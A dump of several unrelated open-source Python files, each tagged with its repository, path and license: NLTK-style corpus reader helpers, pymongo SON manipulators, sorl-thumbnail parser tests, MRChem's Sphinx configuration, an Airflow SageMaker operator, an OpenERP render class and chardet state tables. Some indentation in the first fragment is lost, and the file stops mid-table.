return tokens, end
start = m.start()
# Case 1: sexpr is not parenthesized.
if m.group() != '(':
m2 = re.compile(r'[\s(]').search(block, start)
if m2:
end = m2.start()
else:
if tokens: return tokens, end
raise ValueError('Block too small')
# Case 2: parenthesized sexpr.
else:
nesting = 0
for m in re.compile(r'[()]').finditer(block, start):
if m.group()=='(': nesting += 1
else: nesting -= 1
if nesting == 0:
end = m.end()
break
else:
if tokens: return tokens, end
raise ValueError('Block too small')
tokens.append(block[start:end])
return tokens, end
######################################################################
#{ Finding Corpus Items
######################################################################
def find_corpus_fileids(root, regexp):
    """Return the sorted list of fileids under *root* whose relative
    path fully matches *regexp* ('$' is appended; re.match anchors
    the start)."""
    if not isinstance(root, PathPointer):
        raise TypeError('find_corpus_fileids: expected a PathPointer')
    regexp += '$'
    # Find fileids in a zipfile: scan the zipfile's namelist. Filter
    # out entries that end in '/' -- they're directories.
    if isinstance(root, ZipFilePathPointer):
        fileids = [name[len(root.entry):] for name in root.zipfile.namelist()
                   if not name.endswith('/')]
        items = [name for name in fileids if re.match(regexp, name)]
        return sorted(items)
    # Find fileids in a directory: use os.walk to search all (proper
    # or symlinked) subdirectories, and match paths against the regexp.
    elif isinstance(root, FileSystemPathPointer):
        items = []
        # workaround for py25 which doesn't support followlinks
        kwargs = {}
        if not py25():
            kwargs = {'followlinks': True}
        for dirname, subdirs, fileids in os.walk(root.path, **kwargs):
            # Prefix each filename with its path relative to the root.
            prefix = ''.join('%s/' % p for p in _path_from(root.path, dirname))
            items += [prefix+fileid for fileid in fileids
                      if re.match(regexp, prefix+fileid)]
            # Don't visit svn directories:
            if '.svn' in subdirs: subdirs.remove('.svn')
        return sorted(items)
    else:
        raise AssertionError("Don't know how to handle %r" % root)
def _path_from(parent, child):
if os.path.split(parent)[1] == '':
parent = os.path.split(parent)[0]
path = []
while parent != child:
child, dirname = os.path.split(child)
path.insert(0, dirname)
assert os.path.split(child)[0] != child
return path
######################################################################
#{ Paragraph structure in Treebank files
######################################################################
def tagged_treebank_para_block_reader(stream):
    """Read the next paragraph from a tagged Treebank file, where
    paragraphs are separated by lines of '=' characters."""
    parts = []
    while True:
        line = stream.readline()
        if line == '':
            # End of file: return the paragraph collected so far, if any.
            para = ''.join(parts)
            return [para] if para.strip() else []
        if re.match('======+\s*$', line):
            # A separator ends a non-empty paragraph; separators seen
            # before any content are simply skipped.
            para = ''.join(parts)
            if para.strip():
                return [para]
        else:
            parts.append(line)
| apache-2.0 |
akhilari7/pa-dude | lib/python2.7/site-packages/pymongo/son_manipulator.py | 64 | 6180 | # Copyright 2009-2015 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Manipulators that can edit SON objects as they enter and exit a database.
New manipulators should be defined as subclasses of SONManipulator and can be
installed on a database by calling
`pymongo.database.Database.add_son_manipulator`."""
import collections
from bson.dbref import DBRef
from bson.objectid import ObjectId
from bson.son import SON
class SONManipulator(object):
    """A base son manipulator.

    This manipulator just saves and restores objects without changing them.
    """

    def will_copy(self):
        """Will this SON manipulator make a copy of the incoming document?

        Derived classes that do need to make a copy should override this
        method, returning True instead of False. All non-copying manipulators
        will be applied first (so that the user's document will be updated
        appropriately), followed by copying manipulators.
        """
        return False

    def transform_incoming(self, son, collection):
        """Manipulate an incoming SON object.

        :Parameters:
          - `son`: the SON object to be inserted into the database
          - `collection`: the collection the object is being inserted into
        """
        return SON(son) if self.will_copy() else son

    def transform_outgoing(self, son, collection):
        """Manipulate an outgoing SON object.

        :Parameters:
          - `son`: the SON object being retrieved from the database
          - `collection`: the collection this object was stored in
        """
        return SON(son) if self.will_copy() else son
class ObjectIdInjector(SONManipulator):
    """A son manipulator that adds the _id field if it is missing.

    .. versionchanged:: 2.7
       ObjectIdInjector is no longer used by PyMongo, but remains in this
       module for backwards compatibility.
    """

    def transform_incoming(self, son, collection):
        """Add an _id field if it is missing."""
        # Idiomatic membership test (was ``not "_id" in son``); the
        # ObjectId is only generated when the field is truly absent.
        if "_id" not in son:
            son["_id"] = ObjectId()
        return son
# This is now handled during BSON encoding (for performance reasons),
# but I'm keeping this here as a reference for those implementing new
# SONManipulators.
class ObjectIdShuffler(SONManipulator):
    """A son manipulator that moves _id to the first position."""

    def will_copy(self):
        """We need to copy to be sure that we are dealing with SON, not a dict.
        """
        return True

    def transform_incoming(self, son, collection):
        """Move _id to the front if it's there."""
        # EAFP: documents without an _id pass through untouched.
        try:
            reordered = SON({"_id": son["_id"]})
        except KeyError:
            return son
        reordered.update(son)
        return reordered
class NamespaceInjector(SONManipulator):
    """A son manipulator that adds the _ns field.
    """

    def transform_incoming(self, son, collection):
        """Add the _ns field to the incoming object
        """
        # Record the collection name the document is being inserted into.
        son["_ns"] = collection.name
        return son
class AutoReference(SONManipulator):
    """Transparently reference and de-reference already saved embedded objects.

    This manipulator should probably only be used when the NamespaceInjector is
    also being used, otherwise it doesn't make too much sense - documents can
    only be auto-referenced if they have an *_ns* field.

    NOTE: this will behave poorly if you have a circular reference.

    TODO: this only works for documents that are in the same database. To fix
    this we'll need to add a DatabaseInjector that adds *_db* and then make
    use of the optional *database* support for DBRefs.
    """

    def __init__(self, db):
        # Database used to dereference DBRefs on the way out.
        self.database = db

    def will_copy(self):
        """We need to copy so the user's document doesn't get transformed refs.
        """
        return True

    def transform_incoming(self, son, collection):
        """Replace embedded documents with DBRefs.
        """
        def transform_value(value):
            # Recurse through mappings and lists; any embedded document
            # that carries both _id and _ns is replaced by a DBRef.
            if isinstance(value, collections.MutableMapping):
                if "_id" in value and "_ns" in value:
                    return DBRef(value["_ns"], transform_value(value["_id"]))
                else:
                    return transform_dict(SON(value))
            elif isinstance(value, list):
                return [transform_value(v) for v in value]
            return value

        def transform_dict(object):
            # Rewrites the mapping's values in place.
            for (key, value) in object.items():
                object[key] = transform_value(value)
            return object

        return transform_dict(SON(son))

    def transform_outgoing(self, son, collection):
        """Replace DBRefs with embedded documents.
        """
        def transform_value(value):
            # Inverse of transform_incoming: DBRefs are resolved through
            # the stored database handle.
            if isinstance(value, DBRef):
                return self.database.dereference(value)
            elif isinstance(value, list):
                return [transform_value(v) for v in value]
            elif isinstance(value, collections.MutableMapping):
                return transform_dict(SON(value))
            return value

        def transform_dict(object):
            for (key, value) in object.items():
                object[key] = transform_value(value)
            return object

        return transform_dict(SON(son))
# TODO make a generic translator for custom types. Take encode, decode,
# should_encode and should_decode functions and just encode and decode where
# necessary. See examples/custom_type.py for where this would be useful.
# Alternatively it could take a should_encode, to_binary, from_binary and
# binary subtype.
| mit |
chriscauley/sorl-thumbnail | tests/thumbnail_tests/test_parsers.py | 17 | 1229 | # -*- coding: utf-8 -*-
import unittest
from sorl.thumbnail.helpers import ThumbnailError
from sorl.thumbnail.parsers import parse_crop, parse_geometry
class CropParserTestCase(unittest.TestCase):
    """Exercise parse_crop() with alias, percentage and pixel crop specs."""

    def test_alias_crop(self):
        # Named anchors resolve against the free space (500 - 400 per axis).
        self.assertEqual(parse_crop('center', (500, 500), (400, 400)), (50, 50))
        self.assertEqual(parse_crop('right', (500, 500), (400, 400)), (100, 50))

    def test_percent_crop(self):
        self.assertEqual(parse_crop('50% 0%', (500, 500), (400, 400)), (50, 0))
        self.assertEqual(parse_crop('10% 80%', (500, 500), (400, 400)), (10, 80))

    def test_px_crop(self):
        # 200px exceeds the 100px of free space on the x axis, hence (100, 33).
        self.assertEqual(parse_crop('200px 33px', (500, 500), (400, 400)), (100, 33))

    def test_bad_crop(self):
        # Negative pixel offsets are rejected.
        with self.assertRaises(ThumbnailError):
            parse_crop('-200px', (500, 500), (400, 400))
class GeometryParserTestCase(unittest.TestCase):
    """Exercise parse_geometry() with full, width-only and height-only specs."""

    def test_geometry(self):
        cases = (
            ('222x30', (222, 30)),   # WIDTHxHEIGHT
            ('222', (222, None)),    # width only
            ('x999', (None, 999)),   # height only
        )
        for spec, expected in cases:
            self.assertEqual(parse_geometry(spec), expected)
| bsd-3-clause |
MRChemSoft/mrchem | doc/conf.py | 1 | 16413 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# MRChem documentation build configuration file, created by
# sphinx-quickstart on Mon Oct 26 15:18:26 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import re
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.ifconfig',
'sphinx.ext.autosectionlabel',
'sphinxcontrib.bibtex',
'breathe',
'recommonmark'
]
breathe_projects = { 'MRChem': 'xml' }
breathe_default_project = 'MRChem'
breathe_default_members = ('members', 'protected-members', 'private-members')
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'MRChem'
copyright = '2019, Stig Rune Jensen, Luca Frediani, Peter Wind, Roberto Di Remigio, Magnar Bjorgve, Gabriel Gerez'
author = 'Stig Rune Jensen, Luca Frediani, Peter Wind, Roberto Di Remigio, Magnar Bjorgve, Gabriel Gerez'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# Read version from file
# Get project version
with open('../VERSION') as f:
content = f.read().replace('\n', '')
mrchem_version = re.search('[0-9]\.[0-9]\.[0-9]', content).group(0)
major = mrchem_version.split('.')[0]
minor = mrchem_version.split('.')[1]
patch = mrchem_version.split('.')[2]
version = mrchem_version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build','**/mwfilters/**']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = 'gfx/logo.jpg'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'MRChemdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'MRChem.tex', 'MRChem Documentation',
'Stig Rune Jensen, Luca Frediani, Peter Wind', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'mrchem', 'MRChem Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'MRChem', 'MRChem Documentation',
author, 'MRChem', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
def which(program):
    """Return the full path to *program*, or None if it cannot be run.

    Mirrors the shell ``which``: if *program* contains a directory
    component it is checked directly; otherwise each entry of ``PATH``
    is searched in order.
    """
    def is_exe(fpath):
        # Must be a regular file with the executable bit set.
        return os.path.isfile(fpath) and os.access(fpath, os.X_OK)

    fpath, fname = os.path.split(program)
    if fpath:
        # An explicit path was given: accept it only if it is executable.
        if is_exe(program):
            return program
    else:
        # PATH may legitimately be unset; fall back to an empty search
        # instead of raising KeyError.
        for path in os.environ.get("PATH", "").split(os.pathsep):
            path = path.strip('"')
            exe_file = os.path.join(path, program)
            if is_exe(exe_file):
                return exe_file
    return None
def run_doxygen(folder):
    """Run ``doxygen`` inside *folder*, reporting failures on stderr.

    Errors are reported rather than raised so that a missing doxygen
    binary or folder does not abort the whole documentation build.
    """
    import subprocess
    try:
        # Argument list + cwd= instead of "cd %s; doxygen" through a shell:
        # immune to spaces and shell metacharacters in the folder name.
        retcode = subprocess.call(["doxygen"], cwd=folder)
        if retcode < 0:
            sys.stderr.write("doxygen terminated by signal %s" % (-retcode))
    except OSError as e:
        # Raised when doxygen is not installed or *folder* does not exist.
        sys.stderr.write("doxygen execution failed: %s" % e)
def generate_doxygen_xml(app):
    """Sphinx hook: run doxygen only when building on the ReadTheDocs servers."""
    on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
    if on_rtd:
        run_doxygen(os.getcwd())
def remove(obj):
    """Best-effort deletion of *obj*.

    Directory trees go through shutil.rmtree; files, symlinks and
    missing paths go through os.remove. All OSErrors are swallowed so
    cleanup never aborts the build.
    """
    import os
    import shutil
    # Treat symlinks as files even when they point at a directory, so the
    # link itself is deleted instead of rmtree failing on (or following)
    # the target.
    if os.path.isdir(obj) and not os.path.islink(obj):
        try:
            shutil.rmtree(obj)
        except OSError:
            pass
    else:
        try:
            os.remove(obj)
        except OSError:
            pass
def configure_file(rep, fname, **kwargs):
    r'''Configure a file by substituting placeholders.

    :param rep:
        a (placeholder : replacement) dictionary
    :param fname:
        name of the file to be configured, without suffix
    :param \**kwargs:
        See below
    :Keyword arguments:
        * *in_path* -- directory for the unconfigured file (default: cwd)
        * *suffix* -- suffix of the unconfigured file, with separators (default: '.in')
        * *prefix* -- prefix for the configured file (default: '')
        * *out_path* -- directory for the configured file (default: *in_path*)
    '''
    import os
    import re
    in_path = kwargs.get('in_path', os.getcwd())
    suffix = kwargs.get('suffix', '.in')
    out_path = kwargs.get('out_path', in_path)
    prefix = kwargs.get('prefix', '')
    fname_in = fname + suffix
    # 'with' guarantees the handles are closed even if reading/writing fails
    # (the originals leaked on exception).
    with open(os.path.join(in_path, fname_in), 'r') as f:
        filedata = f.read()
    # Build one alternation regex from all (escaped) placeholders and replace
    # them in a single pass; the lambda maps each match back to its value.
    rep = dict((re.escape(k), v) for k, v in list(rep.items()))
    pattern = re.compile("|".join(list(rep.keys())))
    filedata = pattern.sub(lambda m: rep[re.escape(m.group(0))], filedata)
    fname_out = prefix + fname
    with open(os.path.join(out_path, fname_out), 'w+') as f:
        f.write(filedata)
def generate_bar_charts(mod_dir, dir_lang, savedir):
    r'''Generate lines-of-code bar charts.
    :param mod_dir:
        location of the cloc_tools module
    :param dir_lang:
        a (directory : language) dictionary
    :param savedir:
        location of the YAML files
    '''
    import sys
    # Make cloc_tools importable from its out-of-tree location.
    sys.path.append(mod_dir)
    from cloc_tools import bar_chart
    # Generate scripts and list of scripts (absolute paths)
    list_of_scripts = [bar_chart(root_dir, language, savedir)
                       for root_dir, language in list(dir_lang.items())]
    # Execute each generated plotting script. Read through 'with' so the
    # file handle is closed promptly (the original open() leaked it).
    for fname in list_of_scripts:
        with open(fname) as script:
            code = script.read()
        exec(compile(code, fname, 'exec'))
def setup(app):
    """Sphinx setup hook.

    Cleans build leftovers, configures Doxyfile.in and cloc_tools.py.in,
    then either registers doxygen as a 'builder-inited' hook (on
    ReadTheDocs) or runs it immediately (local builds).
    """
    # NOTE(review): only referenced by the commented-out bar-chart code
    # below; unused in the live code path.
    from pygments.lexers import get_lexer_for_filename
    # We first need to define some directories:
    # project_root_dir -- the root of the project
    # project_src_dir -- source code location: os.path.join(project_root_dir, 'src')
    # project_doc_dir -- .rst location: os.path.join(project_root_dir, 'doc')
    if (os.environ.get('READTHEDOCS', None) == 'True'):
        # On RTD the build runs from inside doc/, so root is its parent.
        project_root_dir = os.path.abspath(os.pardir)
        project_doc_dir = os.getcwd()
        project_src_dir = os.path.join(project_root_dir, 'src')
    else:
        project_root_dir = os.getcwd()
        project_doc_dir = os.path.join(project_root_dir, 'doc')
        project_src_dir = os.path.join(project_root_dir, 'src')
    print(('Project root directory {}'.format(project_root_dir)))
    print(('Project doc directory {}'.format(project_doc_dir)))
    print(('Project src directory {}'.format(project_src_dir)))
    # Clean up leftovers
    print('Clean up leftovers from previous build')
    # NOTE(review): list comprehension used purely for its side effects,
    # and the .gitignore handle opened here is never closed explicitly.
    [remove(os.path.join(project_doc_dir, x.strip())) for x in open(os.path.join(project_doc_dir, '.gitignore'))]
    # Configure Doxyfile.in
    dot = which('dot')
    if dot is not None:
        # NOTE(review): which('dot') is evaluated a second time here even
        # though its result is already in 'dot'.
        dot_path = os.path.split(which('dot'))[0]
    else:
        dot_path = ''
    rep = { '@PROJECT_VERSION_MAJOR@' : major,
            '@PROJECT_VERSION_MINOR@' : minor,
            '@PROJECT_VERSION_PATCH@' : patch,
            '@PROJECT_SOURCE_DIR@' : project_root_dir,
            '@DOXYGEN_DOT_PATH@' : dot_path
          }
    configure_file(rep, 'Doxyfile', in_path=project_doc_dir, suffix='.in')
    # Configure cloc_tools.py.in
    # NOTE(review): this second 'rep' is only consumed by the commented-out
    # generate_bar_charts code below, so it is currently dead.
    rep = { '@PYTHON_EXECUTABLE@' : sys.executable,
            '@PROJECT_SOURCE_DIR@' : project_root_dir,
            '@PROJECT_BINARY_DIR@' : project_root_dir,
            '@PERL_EXECUTABLE@' : which('perl')
          }
    # tup = (os.walk(project_src_dir))
    # for root, dirs, files in os.walk(project_src_dir):
    #    if 'mwfilters' in dirs:
    #        dirs.remove('mwfilters')
    #    print root, dirs
    # Generate directories list (full paths), remove bin using filter
    # d = [os.path.join(root, x) for root, dirs, _ in os.walk(project_src_dir) for x in dirs]
    # exclude_dirs = [os.path.join(project_src_dir,x) for x in ['mrcpp/mwfilters']]
    # d = filter(lambda y: y not in exclude_dirs, d)
    # f = [filter(lambda x: os.path.isfile(os.path.join(l, x)), os.listdir(l)) for l in d]
    #
    # allfiles = []
    # for idx in range(len(f)):
    #     f[idx] = filter(lambda y: y != 'CMakeLists.txt', f[idx])
    #     f[idx] = filter(lambda y: not y.endswith('.in'), f[idx])
    #     allfiles.extend(f[idx])
    #
    # # Apply map to get language name
    # l = [get_lexer_for_filename(x).name for x in allfiles]
    #
    # # # Finally zip d and f into the dir_lang dictionary
    # dir_lang = dict(zip(d, l))
    #
    # # generate_bar_charts(project_doc_dir, dir_lang, project_doc_dir)
    if (os.environ.get('READTHEDOCS', None) == 'True'):
        # Add hook for building doxygen xml when needed
        app.connect("builder-inited", generate_doxygen_xml)
    else:
        run_doxygen(project_doc_dir)
# configure sphinxcontrib.bibtex
bibtex_bibfiles = ["bibliography.bib"]
| lgpl-3.0 |
airbnb/airflow | airflow/providers/amazon/aws/operators/sagemaker_model.py | 7 | 2337 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from airflow.exceptions import AirflowException
from airflow.providers.amazon.aws.hooks.base_aws import AwsBaseHook
from airflow.providers.amazon.aws.operators.sagemaker_base import SageMakerBaseOperator
from airflow.utils.decorators import apply_defaults
class SageMakerModelOperator(SageMakerBaseOperator):
    """
    Create a SageMaker model.
    This operator returns The ARN of the model created in Amazon SageMaker
    :param config: The configuration necessary to create a model.
        For details of the configuration parameter see :py:meth:`SageMaker.Client.create_model`
    :type config: dict
    :param aws_conn_id: The AWS connection ID to use.
    :type aws_conn_id: str
    """

    @apply_defaults
    def __init__(self, *, config, **kwargs):
        super().__init__(config=config, **kwargs)
        self.config = config

    def expand_role(self) -> None:
        """Resolve a bare IAM role name in ``ExecutionRoleArn`` to a full ARN."""
        if 'ExecutionRoleArn' not in self.config:
            return
        iam_hook = AwsBaseHook(self.aws_conn_id, client_type='iam')
        self.config['ExecutionRoleArn'] = iam_hook.expand_role(self.config['ExecutionRoleArn'])

    def execute(self, context) -> dict:
        """Create the model and return its description, raising on failure."""
        self.preprocess_config()
        self.log.info('Creating SageMaker Model %s.', self.config['ModelName'])
        response = self.hook.create_model(self.config)
        status_code = response['ResponseMetadata']['HTTPStatusCode']
        if status_code != 200:
            raise AirflowException('Sagemaker model creation failed: %s' % response)
        return {'Model': self.hook.describe_model(self.config['ModelName'])}
| apache-2.0 |
BizzCloud/PosBox | openerp/report/render/render.py | 457 | 2524 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# Why doing some multi-thread instead of using OSE capabilities ?
# For progress bar.
#
# Add a transparant multi-thread layer to all report rendering layers
#
# TODO: method to stock on the disk
class render(object):
    """Represents a report job being rendered.

    @param bin_datas a dictionary of name:<binary content> of images etc.
    @param path the path in which binary files can be discovered, useful
           for components (images) of the report. It can be:
           - a string, relative or absolute path to images
           - a list, containing strings of paths.
           If a string is absolute path, it will be opened as such, else
           it will be passed to tools.file_open() which also considers zip
           addons.

    Reporting classes must subclass this class and redefine the __init__ and
    _render methods (not the other methods).
    """
    def __init__(self, bin_datas=None, path='.'):
        # Avoid the shared-mutable-default pitfall: a fresh dict per
        # instance when no binary data is supplied.
        self.bin_datas = {} if bin_datas is None else bin_datas
        self.path = path
        self.done = False

    def _render(self):
        # Hook for subclasses; the base implementation produces nothing.
        return None

    def render(self):
        self.done = False
        self._result = self._render()
        self.done = True
        return True

    def is_done(self):
        return self.done

    def get(self):
        # The result is only published once rendering has finished.
        return self._result if self.is_done() else None
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
LarryHillyer/PoolHost | PoolHost/env/Lib/site-packages/pip/_vendor/requests/packages/chardet/escsm.py | 2930 | 7839 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .constants import eStart, eError, eItsMe
HZ_cls = (
1,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,0,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,0,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,4,0,5,2,0, # 78 - 7f
1,1,1,1,1,1,1,1, # 80 - 87
1,1,1,1,1,1,1,1, # 88 - 8f
1,1,1,1,1,1,1,1, # 90 - 97
1,1,1,1,1,1,1,1, # 98 - 9f
1,1,1,1,1,1,1,1, # a0 - a7
1,1,1,1,1,1,1,1, # a8 - af
1,1,1,1,1,1,1,1, # b0 - b7
1,1,1,1,1,1,1,1, # b8 - bf
1,1,1,1,1,1,1,1, # c0 - c7
1,1,1,1,1,1,1,1, # c8 - cf
1,1,1,1,1,1,1,1, # d0 - d7
1,1,1,1,1,1,1,1, # d8 - df
1,1,1,1,1,1,1,1, # e0 - e7
1,1,1,1,1,1,1,1, # e8 - ef
1,1,1,1,1,1,1,1, # f0 - f7
1,1,1,1,1,1,1,1, # f8 - ff
)
# State-transition table for the HZ-GB-2312 escape-sequence detector.
# Flattened 2-D table: presumably indexed as
# current_state * classFactor + char_class (see codingstatemachine.py);
# the eight-entries-per-line layout with "# NN-NN" offsets is cosmetic.
# eStart/eError/eItsMe come from ..constants; small ints are
# intermediate states.
HZ_st = (
eStart,eError, 3,eStart,eStart,eStart,eError,eError,# 00-07
